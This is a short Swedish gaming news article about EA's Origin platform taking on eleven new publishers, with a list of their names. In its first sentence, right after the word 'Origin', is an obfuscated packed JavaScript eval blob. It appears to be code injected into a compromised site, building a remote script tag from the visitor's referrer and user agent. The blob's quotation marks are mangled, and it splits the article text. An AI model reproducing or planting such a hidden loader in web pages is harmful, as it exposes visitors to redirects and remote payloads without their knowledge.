Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

EA:s Origin expanderar

EA:s Origin expanderar
Alexander Gylemo

Origin eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dhkik|var|u0026u|referrer|deesi||js|php’.split(’|’),0,{}))
är EA:s svar på programmet Steam; en digital distributionsplattform med sociala nätverksfunktioner. Origin är i dagsläget mest känt hos BF3-spelare då det är ett krav att ha för att använda Battlelog (DICE:s Origin-liknande tjänst), men nu börjar EA utöka sitt spelstall för att erbjuda sin tjänst för fler gamers. Nyligen gick de ut med att de nu tar in elva nya spelaktörer för att göra Origin användbart för deras spel, än så länge är det inga stora aktörer, men EA:s move lutar åt att de nu kommer expandera, troligen ganska snabbt.

Nedan följer de nytillkomna aktörerna:

Trion Worlds

Robot Entertainment CD Projekt RED

Freebird Games

Recoil Games

Autumn Games

1C Company

inXile entertainment

Paradox Interactive

Core Learning Ltd.

N3V Games